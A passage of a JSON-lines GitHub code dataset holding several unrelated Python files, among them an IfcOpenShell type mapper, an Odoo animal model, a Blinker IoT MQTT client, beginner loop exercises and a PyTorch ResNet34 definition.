data.get('exact_country_match')\n except Exception as error:\n LOGGER.warning('Error when loading location Address', exc_info=error)\n\n def __repr__(self) -> str:\n return f'Address<{self.city_name}>'\n\n \n def to_dict(self) -> dict:\n data = vars(self)\n for key in data:\n if isinstance(data[key], list):\n values = list()\n for item in data[key]:\n if hasattr(item, 'to_dict'):\n values.append(item.to_dict())\n continue\n values.append(item)\n data[key] = values\n return data","repo_name":"davidwickerhf/instaclient","sub_path":"instaclient/instagram/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"48"} +{"seq_id":"71316472787","text":"###############################################################################\n# #\n# This file is part of IfcOpenShell. #\n# #\n# IfcOpenShell is free software: you can redistribute it and/or modify #\n# it under the terms of the Lesser GNU General Public License as published by #\n# the Free Software Foundation, either version 3.0 of the License, or #\n# (at your option) any later version. #\n# #\n# IfcOpenShell is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# Lesser GNU General Public License for more details. #\n# #\n# You should have received a copy of the Lesser GNU General Public License #\n# along with this program. If not, see . #\n# #\n###############################################################################\n\nimport nodes\nimport templates\n\nclass Mapping:\n\n express_to_cpp_typemapping = {\n 'boolean' : 'bool',\n 'logical' : 'bool',\n 'integer' : 'int',\n 'real' : 'double',\n 'number' : 'double',\n 'string' : 'std::string'\n }\n\n def __init__(self, schema):\n self.schema = schema\n \n def flatten_type_string(self, type):\n return self.flatten_type_string(self.schema.types[type].type.type) if self.schema.is_simpletype(type) else type\n \n def flatten_type(self, type):\n res = self.flatten_type(self.schema.types[type].type.type) if self.schema.is_simpletype(type) else type\n return res\n \n def simple_type_parent(self, type):\n parent = self.schema.types[type].type.type\n if isinstance(parent, nodes.AggregationType): parent = None\n return None if parent in self.express_to_cpp_typemapping else parent\n\n def make_type_string(self, type):\n if isinstance(type, str):\n return self.express_to_cpp_typemapping.get(type, type)\n else:\n is_list = self.schema.is_entity(type.type)\n is_nested_list = isinstance(type.type, nodes.AggregationType)\n tmpl = templates.list_list_type if is_nested_list else templates.list_type if is_list else templates.array_type\n return tmpl % {\n 'instance_type' : self.make_type_string(type.type),\n 'lower' : type.bounds.lower,\n 'upper' : type.bounds.upper,\n }\n\n def is_array(self, type):\n if isinstance(type, nodes.AggregationType):\n return True\n elif isinstance(type, str) and self.schema.is_type(type):\n return self.is_array(self.schema.types[type].type.type)\n else:\n return False\n \n def make_argument_entity(self, attr):\n type = attr.type if hasattr(attr, 'type') else attr\n while isinstance(type, nodes.AggregationType): type = type.type\n if type in self.express_to_cpp_typemapping or isinstance(type, nodes.BinaryType): return \"Type::UNDEFINED\"\n else: return \"Type::%s\" % type \n\n def make_argument_type(self, attr):\n def _make_argument_type(type):\n if type in self.express_to_cpp_typemapping:\n return self.express_to_cpp_typemapping.get(type, type).split('::')[-1].upper()\n elif self.schema.is_entity(type):\n return \"ENTITY\"\n elif self.schema.is_type(type):\n return _make_argument_type(self.schema.types[type].type.type)\n elif isinstance(type, nodes.BinaryType):\n return \"UNKNOWN\"\n elif isinstance(type, nodes.EnumerationType):\n return \"ENUMERATION\"\n elif isinstance(type, nodes.SelectType):\n return \"ENTITY\"\n elif isinstance(type, nodes.AggregationType):\n ty = _make_argument_type(type.type)\n if ty == \"UNKNOWN\": return \"UNKNOWN\"\n return \"%s_LIST\"%ty if ty.startswith(\"ENTITY\") else (\"VECTOR_%s\"%ty)\n else: raise ValueError\n supported = {'INT', 'BOOL', 'DOUBLE', 'STRING', 'VECTOR_INT', 'VECTOR_DOUBLE', 'VECTOR_STRING', 'ENTITY', 'ENTITY_LIST', 'ENTITY_LIST_LIST', 'ENUMERATION'}\n ty = _make_argument_type(attr.type if hasattr(attr, 'type') else attr)\n if ty not in supported: ty = 'UNKNOWN'\n return \"IfcUtil::Argument_%s\" % ty\n\n def get_type_dep(self, type):\n if isinstance(type, str):\n return self.express_to_cpp_typemapping.get(type, type)\n else:\n return self.get_type_dep(type.type)\n\n def get_parameter_type(self, attr, allow_optional, allow_entities, allow_pointer = True):\n \n attr_type = self.flatten_type(attr.type)\n type_str = self.express_to_cpp_typemapping.get(str(attr_type), attr_type)\n \n is_ptr = False\n \n if self.schema.is_enumeration(attr_type):\n type_str = '%s::%s'%(attr_type, attr_type)\n elif isinstance(type_str, nodes.AggregationType):\n is_nested_list = isinstance(attr_type.type, nodes.AggregationType)\n ty = self.get_parameter_type(attr_type.type if is_nested_list else attr_type, False, allow_entities, False)\n if True and self.schema.is_select(attr_type.type):\n type_str = templates.untyped_list\n elif self.schema.is_simpletype(ty) or ty in self.express_to_cpp_typemapping.values():\n type_str = templates.array_type % {\n 'instance_type' : ty,\n 'lower' : attr_type.bounds.lower,\n 'upper' : attr_type.bounds.upper\n }\n else:\n tmpl = templates.list_list_type if is_nested_list else templates.list_type\n type_str = tmpl % {\n 'instance_type': ty\n }\n elif allow_pointer and (self.schema.is_entity(type_str) or self.schema.is_select(type_str)):\n type_str += '*'\n is_ptr = True\n elif not allow_pointer and self.schema.is_select(type_str):\n type_str = \"IfcUtil::IfcBaseClass*\"\n is_ptr = True\n if allow_optional and attr.optional and not is_ptr:\n type_str = \"boost::optional< %s >\"%type_str\n return type_str\n\n def argument_count(self, t):\n c = sum([self.argument_count(self.schema.entities[s]) for s in t.supertypes])\n return c + len(t.attributes)\n\n def arguments(self, t):\n c = sum([self.arguments(self.schema.entities[s]) for s in t.supertypes], [])\n return c + t.attributes\n\n def derived_in_supertype(self, t):\n c = sum([self.derived_in_supertype(self.schema.entities[s]) for s in t.supertypes], [])\n return c + ([str(s) for s in t.derive.elements] if t.derive else [])\n\n def list_instance_type(self, attr):\n f = lambda v : 'IfcUtil::IfcBaseClass' if self.schema.is_select(v) else v\n if self.is_array(attr.type):\n if not isinstance(attr.type, str) and self.is_array(attr.type.type):\n if isinstance(attr.type.type, str):\n return f(attr.type.type)\n else: return f(attr.type.type.type)\n else:\n if isinstance(attr.type, str):\n return f(attr.type)\n else: return f(attr.type.type)\n return None\n\n def is_templated_list(self, attr):\n ty = self.list_instance_type(attr)\n arr = self.is_array(attr.type)\n simple = self.schema.is_simpletype(ty)\n express = ty in self.express_to_cpp_typemapping\n select = ty == 'IfcUtil::IfcBaseClass'\n return arr and not simple and not express and not select\n\n def get_assignable_arguments(self, t, include_derived = False):\n count = self.argument_count(t)\n num_inherited = count - len(t.attributes)\n derived = set(self.derived_in_supertype(t))\n attrs = enumerate(self.arguments(t))\n\n def include(attr):\n not_derived = include_derived or (attr.name not in derived)\n supported = self.make_argument_type(attr) != \"IfcUtil::Argument_UNKNOWN\"\n return not_derived and supported\n\n return [{\n 'index' : i+1,\n 'name' : attr.name,\n 'full_type' : self.get_parameter_type(attr, allow_optional=True, allow_entities=True),\n 'specialized_type' : self.get_parameter_type(attr, allow_optional=True, allow_entities=False),\n 'non_optional_type' : self.get_parameter_type(attr, allow_optional=False, allow_entities=False),\n 'list_instance_type' : self.list_instance_type(attr),\n 'is_optional' : attr.optional,\n 'is_inherited' : i < num_inherited,\n 'is_enum' : attr.type in self.schema.enumerations,\n 'is_array' : self.is_array(attr.type),\n 'is_nested' : self.is_array(attr.type) and not isinstance(attr.type, str) and self.is_array(attr.type.type),\n 'is_derived' : attr.name in derived,\n 'is_templated_list' : self.is_templated_list(attr),\n 'argument_type_enum' : self.make_argument_type(attr),\n 'argument_entity' : self.make_argument_entity(attr),\n 'argument_type' : attr.type\n } for i, attr in attrs if include(attr)]\n\n","repo_name":"aothms/IfcOpenShell_PythonWrapper","sub_path":"src/ifcexpressparser/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":9962,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"35015198623","text":"from datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import timedelta as td\n\nfrom openerp import api, fields, models\nfrom openerp.fields import Date as fDate\nfrom openerp.exceptions import UserError\n\n\nclass Animal(models.Model):\n _name = 'myo.animal'\n _inherit = 'myo.random.model'\n\n @api.multi\n @api.depends('name', 'code', 'age')\n def name_get(self):\n result = []\n for record in self:\n result.append(\n (record.id,\n u'%s [%s] (%s)' % (record.name, record.code, record.age)\n ))\n return result\n\n name = fields.Char('Name', required=True)\n alias = fields.Char('Alias', help='Common name that the Animal is referred.')\n code = fields.Char(string='Animal Code', required=False)\n user_id = fields.Many2one('res.users', 'Animal Responsible', required=False, readonly=False)\n notes = fields.Text(string='Notes')\n date_inclusion = fields.Datetime(\"Inclusion Date\", required=False, readonly=False,\n default=lambda *a: datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n country_id = fields.Many2one('res.country', 'Nationality')\n birthday = fields.Date(\"Date of Birth\")\n age = fields.Char(\n string='Age',\n compute='_compute_age',\n store=True\n )\n estimated_age = fields.Char(string='Estimated Age', required=False)\n # date_reference = fields.Date(\"Reference Date\")\n # age_reference = fields.Char(\n # string='Reference Age',\n # compute='_compute_age_reference',\n # store=True\n # )\n father_id = fields.Many2one('myo.animal', 'Father', ondelete='restrict')\n mother_id = fields.Many2one('myo.animal', 'Mother', ondelete='restrict')\n tutor_id = fields.Many2one('myo.person', 'Tutor', ondelete='restrict')\n identification_id = fields.Char('Animal ID')\n gender = fields.Selection(\n [('M', 'Male'),\n ('F', 'Female')\n ], 'Gender'\n )\n spayed = fields.Selection(\n [('Y', 'Yes'),\n ('N', 'No')\n ], 'Spayed'\n )\n species_id = fields.Many2one('myo.animal.species', 'Species', ondelete='restrict')\n breed_id = fields.Many2one(\n 'myo.animal.breed',\n 'Breed', ondelete='restrict',\n domain=\"[('species_id','=',species_id)]\"\n )\n breed = fields.Text(string='Breed')\n active = fields.Boolean('Active',\n help=\"If unchecked, it will allow you to hide the animal without removing it.\",\n default=1)\n\n _order = 'name'\n\n _sql_constraints = [\n ('code_uniq',\n 'UNIQUE(code)',\n u'Error! The Animal Code must be unique!'\n )\n ]\n\n @api.multi\n @api.constrains('birthday')\n def _check_birthday(self):\n for animal in self:\n if animal.birthday > fields.Date.today():\n raise UserError(u'Date of Birth must be in the past!')\n\n @api.one\n @api.depends('birthday')\n def _compute_age(self):\n now = datetime.now()\n if self.birthday:\n dob = datetime.strptime(self.birthday, '%Y-%m-%d')\n delta = relativedelta(now, dob)\n # self.age = str(delta.years) + \"y \" + str(delta.months) + \"m \" + str(delta.days) + \"d\"\n self.age = str(delta.years)\n else:\n self.age = \"No Date of Birth!\"\n\n # @api.one\n # @api.depends('date_reference', 'birthday')\n # def _compute_age_reference(self):\n # if self.date_reference:\n # # now = self.date_reference\n # if self.birthday:\n # dob = datetime.strptime(self.birthday, '%Y-%m-%d')\n # now = datetime.strptime(self.date_reference, '%Y-%m-%d')\n # delta = relativedelta(now, dob)\n # # self.age_reference = str(delta.years) + \"y \" + str(delta.months) + \"m \" + str(delta.days) + \"d\"\n # self.age_reference = str(delta.years)\n # else:\n # self.age_reference = \"No Date of Birth!\"\n # else:\n # self.age_reference = \"No Reference Date!\"\n","repo_name":"MostlyOpen/odoo_addons","sub_path":"myo_animal/models/animal.py","file_name":"animal.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44082862986","text":"# 0-100间 所有偶数和\nsum = 0\nprint('计算0-100间所有偶数和')\nfor i in range(0,101,2):# 因为是要求偶数 所有要几个2\n sum +=i\nprint(sum)\n\n# 打印99乘法表\ni =1\nwhile i <10:\n j = 1\n while j<=i:\n print('%d*%d=%d\\t'%(j,i,i*j),end = '')\n j += 1\n print('')\n i += 1\n\nvarl = int(input('请输入一个整数:'))\nif varl >0 and varl<10:\n print('你输入的是一个大于0,小于10的数')\nelif varl >=10:\n print('你输入的数大于或等于10')\nelse:\n print('你输入的为负数')\n\nfor i in range(5):\n #print(i ,end=' ') # 不换行\n #print(i,end='\\n') # 换行\n print(i,end = '\\t') # 空格\n","repo_name":"guandongling/deeptest","sub_path":"第一期/深圳--NLJY/005.py","file_name":"005.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"2616776605","text":"try:\n import modules.urequests as requests\nexcept ImportError:\n import requests\nimport ujson\nfrom modules.simple import MQTTClient\nfrom Blinker.BlinkerConfig import *\nfrom Blinker.BlinkerDebug import *\nfrom BlinkerUtility.BlinkerUtility import *\n\nclass MQTTProtocol(object):\n host = ''\n port = ''\n subtopic = ''\n pubtopic = ''\n deviceName = ''\n clientID = ''\n userName = ''\n password = ''\n uuid = ''\n msgBuf = ''\n isRead = False\n isAliRead = False\n isDuerRead = False\n state = CONNECTING\n isAlive = False\n isAliAlive = False\n isDuerAlive = False\n printTime = 0\n aliPrintTime = 0\n duerPrintTime = 0\n kaTime = 0\n aliKaTime = 0\n duerKaTime = 0\n debug = BLINKER_DEBUG\n smsTime = 0\n pushTime = 0\n wechatTime = 0\n weatherTime = 0\n aqiTime = 0\n\nclass BlinkerMQTT(MQTTProtocol):\n def checkKA(self):\n if self.isAlive is False:\n return False\n if (millis() - self.kaTime) < BLINKER_MQTT_KEEPALIVE:\n return True\n else:\n self.isAlive = False\n return False\n\n def checkAliKA(self):\n if self.isAliAlive is False:\n return False\n if (millis() - self.aliKaTime) < BLINKER_MQTT_KEEPALIVE:\n return True\n else:\n self.isAliAlive = False\n return False\n\n def checkDuerKA(self):\n if self.isDuerAlive is False:\n return False\n if (millis() - self.duerKaTime) < BLINKER_MQTT_KEEPALIVE:\n return True\n else:\n self.isDuerAlive = False\n return False\n\n def checkCanPrint(self):\n if self.checkKA() is False:\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n if (millis() - self.printTime) >= BLINKER_MQTT_MSG_LIMIT or self.printTime == 0:\n return True\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n\n def checkAliCanPrint(self):\n if self.checkAliKA() is False:\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n if (millis() - self.aliPrintTime) >= BLINKER_MQTT_MSG_LIMIT or self.aliPrintTime == 0:\n return True\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n\n def checkDuerCanPrint(self):\n if self.checkDuerKA() is False:\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n if (millis() - self.duerPrintTime) >= BLINKER_MQTT_MSG_LIMIT or self.duerPrintTime == 0:\n return True\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n\n def checkSMS(self):\n if (millis() - self.smsTime) >= BLINKER_SMS_MSG_LIMIT or self.smsTime == 0:\n return True\n BLINKER_ERR_LOG(\"SMS MSG LIMIT\")\n return False\n\n def checkPUSH(self):\n if (millis() - self.pushTime) >= BLINKER_PUSH_MSG_LIMIT or self.pushTime == 0:\n return True\n BLINKER_ERR_LOG(\"PUSH MSG LIMIT\")\n return False\n\n def checkWECHAT(self):\n if (millis() - self.wechatTime) >= BLINKER_PUSH_MSG_LIMIT or self.wechatTime == 0:\n return True\n BLINKER_ERR_LOG(\"WECHAT MSG LIMIT\")\n return False\n\n def checkWEATHER(self):\n if (millis() - self.weatherTime) >= BLINKER_WEATHER_MSG_LIMIT or self.weatherTime == 0:\n return True\n BLINKER_ERR_LOG(\"WEATHER MSG LIMIT\")\n return False\n\n def checkAQI(self):\n if (millis() - self.aqiTime) >= BLINKER_AQI_MSG_LIMIT or self.aqiTime == 0:\n return True\n BLINKER_ERR_LOG(\"AQI MSG LIMIT\")\n return False\n\n def delay100ms(self):\n start = millis()\n time_run = 0\n while time_run < 100:\n time_run = millis() - start\n\n def delay10s(self):\n start = millis()\n time_run = 0\n while time_run < 10000:\n time_run = millis() - start\n\n def checkAuthData(self, data):\n if data['detail'] == BLINKER_CMD_NOTFOUND:\n while True:\n BLINKER_ERR_LOG(\"Please make sure you have put in the right AuthKey!\")\n self.delay10s()\n\n @classmethod\n def getInfo(cls, auth, aliType, duerType):\n host = 'https://iot.diandeng.tech'\n url = '/api/v1/user/device/diy/auth?authKey=' + auth\n\n if aliType :\n url = url + aliType\n\n if duerType :\n url = url + duerType\n\n r = requests.get(host + url)\n\n data = r.json()\n cls().checkAuthData(data)\n # if cls().isDebugAll() is True:\n BLINKER_LOG_ALL('Device Auth Data: ', data)\n \n data = r.json()\n deviceName = data['detail']['deviceName']\n iotId = data['detail']['iotId']\n iotToken = data['detail']['iotToken']\n productKey = data['detail']['productKey']\n uuid = data['detail']['uuid']\n broker = data['detail']['broker']\n\n bmt = cls()\n\n BLINKER_LOG_ALL('deviceName: ', deviceName)\n BLINKER_LOG_ALL('iotId: ', iotId)\n BLINKER_LOG_ALL('iotToken: ', iotToken)\n BLINKER_LOG_ALL('productKey: ', productKey)\n BLINKER_LOG_ALL('uuid: ', uuid)\n BLINKER_LOG_ALL('broker: ', broker)\n BLINKER_LOG_ALL('host + url: ', host + url)\n\n if broker == 'aliyun':\n bmt.host = BLINKER_MQTT_ALIYUN_HOST\n bmt.port = BLINKER_MQTT_ALIYUN_PORT\n else:\n bmt.host = data['detail']['host'].replace('mqtts://','')\n bmt.port = data['detail']['port']\n bmt.subtopic = '/device/' + deviceName + '/r'\n bmt.pubtopic = '/device/' + deviceName + '/s'\n bmt.clientID = deviceName\n bmt.userName = iotId\n bmt.deviceName = deviceName\n bmt.password = iotToken\n bmt.uuid = uuid\n\n # if bmt.isDebugAll() is True:\n BLINKER_LOG_ALL('clientID: ', bmt.clientID)\n BLINKER_LOG_ALL('userName: ', bmt.userName)\n BLINKER_LOG_ALL('password: ', bmt.password)\n BLINKER_LOG_ALL('subtopic: ', bmt.subtopic)\n BLINKER_LOG_ALL('pubtopic: ', bmt.pubtopic)\n return bmt\n\ndef on_message(topic, msg):\n BLINKER_LOG_ALL('payload: ', msg)\n data = ujson.loads(msg)\n\nclass MQTTClients():\n def __init__(self):\n self.auth = ''\n self._isClosed = False\n self.client = None\n self.bmqtt = None\n self.mProto = BlinkerMQTT()\n self.aliType = ''\n self.duerType = ''\n self.isMQTTinit = False\n self.mqttPing = 0\n\n def start(self, auth, aliType, duerType):\n self.auth = auth\n self.aliType = aliType\n self.duerType = duerType \n\n def on_message(self, topic, msg):\n BLINKER_LOG_ALL('payload: ', msg)\n data = ujson.loads(msg)\n fromDevice = data['fromDevice']\n data = data['data']\n data = ujson.dumps(data)\n BLINKER_LOG_ALL('fromDevice:', fromDevice, ', data: ', data)\n if fromDevice == self.bmqtt.uuid :\n BLINKER_LOG_ALL('from uuid')\n self.bmqtt.msgBuf = data\n self.bmqtt.isRead = True\n self.bmqtt.isAlive = True\n self.bmqtt.kaTime = millis()\n elif fromDevice == 'AliGenie':\n BLINKER_LOG_ALL('from aligenie')\n self.bmqtt.msgBuf = data\n self.bmqtt.isAliRead = True\n self.bmqtt.isAliAlive = True\n self.bmqtt.aliKaTime = millis() \n elif fromDevice == 'DuerOS':\n BLINKER_LOG_ALL('from dueros')\n self.bmqtt.msgBuf = data\n self.bmqtt.isDuerRead = True\n self.bmqtt.isDuerAlive = True\n self.bmqtt.duerKaTime = millis() \n\n def pub(self, msg, state=False):\n if state is False:\n if self.bmqtt.checkCanPrint() is False:\n return\n payload = {'fromDevice': self.bmqtt.deviceName, 'toDevice': self.bmqtt.uuid, 'data': msg , 'deviceType': 'OwnApp'}\n payload = ujson.dumps(payload)\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('Publish topic: ', self.bmqtt.pubtopic)\n BLINKER_LOG_ALL('payload: ', payload)\n self.client.publish(self.bmqtt.pubtopic, payload)\n self.bmqtt.printTime = millis()\n\n def aliPrint(self, msg):\n if self.bmqtt.checkAliCanPrint() is False:\n return\n payload = {'fromDevice': self.bmqtt.deviceName, 'toDevice': 'AliGenie_r', 'data': msg , 'deviceType': 'vAssistant'}\n payload = ujson.dumps(payload)\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('Publish topic: ', self.bmqtt.pubtopic)\n BLINKER_LOG_ALL('payload: ', payload)\n self.client.publish(self.bmqtt.pubtopic, payload)\n self.bmqtt.aliPrintTime = millis()\n\n def duerPrint(self, msg):\n if self.bmqtt.checkDuerCanPrint() is False:\n return\n payload = {'fromDevice': self.bmqtt.deviceName, 'toDevice': 'DuerOS_r', 'data': msg , 'deviceType': 'vAssistant'}\n payload = ujson.dumps(payload)\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('Publish topic: ', self.bmqtt.pubtopic)\n BLINKER_LOG_ALL('payload: ', payload)\n self.client.publish(self.bmqtt.pubtopic, payload)\n\n def sms(self, msg):\n if self.bmqtt.checkSMS() is False:\n return\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'msg': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/sms',\n data=payload, headers={'Content-Type': 'application/json'})\n\n self.bmqtt.smsTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n\n def push(self, msg):\n if self.bmqtt.checkPUSH() is False:\n return\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'msg': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/push',\n data=payload, headers={'Content-Type': 'application/json'})\n\n self.bmqtt.pushTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n\n def wechat(self, title, state, msg):\n if self.bmqtt.checkWECHAT() is False:\n return\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'title':title, 'state':state, 'msg': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/wxMsg/',\n data=payload, headers={'Content-Type': 'application/json'})\n\n self.bmqtt.pushTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n\n def dataUpdate(self, msg):\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'data': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/cloudStorage/',\n data=payload, headers={'Content-Type': 'application/json'})\n\n self.bmqtt.pushTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n return False\n return True\n\n def weather(self, city):\n if self.bmqtt.checkWEATHER() is False:\n return\n host = 'https://iot.diandeng.tech'\n url = '/api/v1/user/device/weather/now?deviceName=' + self.bmqtt.deviceName + '&key=' + self.auth + '&location=' + city\n\n r = requests.get(url=host + url)\n data = ''\n\n self.bmqtt.weatherTime = millis()\n\n # if r.status_code != 200:\n # BLINKER_ERR_LOG('Device Auth Error!')\n # return\n # else:\n data = r.json()\n return data['detail']\n\n def aqi(self, city):\n if self.bmqtt.checkAQI() is False:\n return\n host = 'https://iot.diandeng.tech'\n url = '/api/v1/user/device/weather/now?deviceName=' + self.bmqtt.deviceName + '&key=' + self.auth + '&location=' + city\n\n r = requests.get(url=host + url)\n data = '' \n\n self.bmqtt.aqiTime = millis()\n\n # if r.status_code != 200:\n # BLINKER_ERR_LOG('Device Auth Error!')\n # return\n # else:\n data = r.json()\n return data['detail']\n\n def connect(self):\n if self.isMQTTinit is False :\n self.bmqtt = self.mProto.getInfo(self.auth, self.aliType, self.duerType)\n self.isMQTTinit = True\n self.client = MQTTClient(client_id = self.bmqtt.clientID, \n server = self.bmqtt.host, port = self.bmqtt.port, \n user = self.bmqtt.userName, password =self.bmqtt.password, \n keepalive = 60, ssl = True)\n self.client.set_callback(self.on_message)\n self.client.connect()\n self.client.subscribe(self.bmqtt.subtopic)\n\n self.mqttPing = millis()\n\n self.bmqtt.state = CONNECTED\n else :\n try:\n self.client.check_msg()\n self.mProto.delay100ms()\n except Exception as error:\n self.client.disconnect()\n MQTTClients.reconnect(self)\n\n def reconnect(self):\n try:\n MQTTClients.register(self)\n\n self.client = MQTTClient(client_id = self.bmqtt.clientID, \n server = self.bmqtt.host, port = self.bmqtt.port, \n user = self.bmqtt.userName, password =self.bmqtt.password, \n keepalive = 60, ssl = True)\n self.client.set_callback(self.on_message)\n self.client.connect(clean_session = True)\n self.client.subscribe(self.bmqtt.subtopic)\n except Exception as error:\n BLINKER_ERR_LOG('MQTT reconnect failed...')\n\n def register(self):\n self.bmqtt = self.mProto.getInfo(self.auth, self.aliType, self.duerType)\n","repo_name":"blinker-iot/blinker-mpy","sub_path":"BlinkerAdapters/BlinkerWiFi.py","file_name":"BlinkerWiFi.py","file_ext":"py","file_size_in_byte":14500,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"24017394551","text":"import plotly.graph_objects as go\nimport tkinter as tk\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport csv\n\n\ndef display(lat,lon):\n mapbox_access_token = open(\"mapbox_token\").read()\n\n fig = go.Figure(go.Scattermapbox(\n lat=lat,\n lon=lon,\n mode='markers',\n marker=go.scattermapbox.Marker(\n size=14\n ),\n text=['Brothers Launch Site'],\n ))\n\n fig.update_layout(\n hovermode='closest',\n mapbox=dict(\n accesstoken=mapbox_access_token,\n bearing=0,\n center=go.layout.mapbox.Center(\n lat=43.799088,\n lon=-120.650253\n ),\n pitch=0,\n zoom=25\n )\n )\n\n fig.show()\n","repo_name":"ECEUSLI-at-Oregon-State/Avionics_Firmware","sub_path":"gui/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21859113324","text":"#!/usr/bin/env python\n#coding:utf-8\nimport cv2\n\nclass smilar():\n def __init__(self, filename):\n img = cv2.imread(filename)\n self.s8 = cv2.resize(img, (8,8))\n\n gary = cv2.cvtColor(self.s8, cv2.COLOR_BGR2GRAY)\n\n val = cv2.mean(gary)\n\n self.__feature = []\n # for i in range(len(gary)):\n # g = gary[i]\n # for p in g:\n # if p > val:\n # self.__feature.append(1)\n # else:\n # self.__feature.append(0)\n\n def feature(self):\n return self.__feature\n\n def check(self, target):\n sm = 0\n for t, s in zip(target, self.__feature):\n if t != s:\n sm += 1\n #sm 数据越大,越不相似\n return sm\n","repo_name":"tcjinr20/dsimg","sub_path":"serach/smilar.py","file_name":"smilar.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14846649163","text":"import os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass Residual(nn.Sequential):\n def __init__(self, *layers):\n super().__init__(*layers)\n bns = [layer for layer in self.modules() if isinstance(layer, nn.BatchNorm2d)]\n last_bn = bns[-1]\n last_bn.weight.data.zero_()\n\n def forward(self, input):\n return input + super().forward(input)\n\n\ndef conv_block(c_in, c_out, ks=3, stride=1, activation=True):\n pad = (ks - 1) // 2 # preserve spatial dimension\n non_linearity = nn.ReLU() if activation else nn.Identity()\n return nn.Sequential(\n nn.Conv2d(c_in, c_out, ks, stride, pad, bias = False),\n nn.BatchNorm2d(c_out),\n non_linearity,\n )\n\n\ndef residual_block(c_in, c_out, ks=3, stride=1, repeat=None):\n if repeat is None:\n return nn.Sequential(\n Residual(\n conv_block(c_in, c_out, ks, stride),\n conv_block(c_out, c_out, ks, stride, activation=False),\n ),\n nn.ReLU(),\n )\n else:\n return nn.Sequential(\n *[residual_block(c_in, c_out, ks=3, stride=1) for _ in range(repeat)]\n )\n\n\ndef downsampling_block(c_in, c_out, ks=3):\n return nn.Sequential(\n conv_block(c_in, c_out, ks, 2),\n conv_block(c_out, c_out, ks, 1),\n )\n\n\ndef define_resnet34(n_classes = 120):\n return nn.Sequential(\n conv_block(3, 64, 3, 1),\n downsampling_block(64, 64),\n downsampling_block(64, 64),\n residual_block(64, 64, repeat=3),\n downsampling_block(64, 128),\n residual_block(128, 128, repeat=3),\n downsampling_block(128, 256),\n residual_block(256, 256, repeat=5),\n downsampling_block(256, 512),\n residual_block(512, 512, repeat=2),\n nn.AvgPool2d(7),\n nn.Flatten(),\n nn.Linear(512, n_classes),\n )\n\nmodel = define_resnet34()\n","repo_name":"Venzel13/computer_vision","sub_path":"resnet34.py","file_name":"resnet34.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19138043906","text":"import os\nimport argparse\nimport glob\n\nDEBUG = True\n\nif DEBUG:\n\t# Main folders testing\n\tMAINDIR = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ENIGMA_SULCI53/ENIGMA_BV45/sulcus-parameterization-pipeline/' #Scripts Folder\n\tBVDIR = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ABCD/recomT1/bv_dir_final2/' # Folder containing subjects processed with brainvisa\n\t#FSDIR = '/home/zaffaro/Desktop/fs_subjects' # INPUTS, folder containing subjects processed with 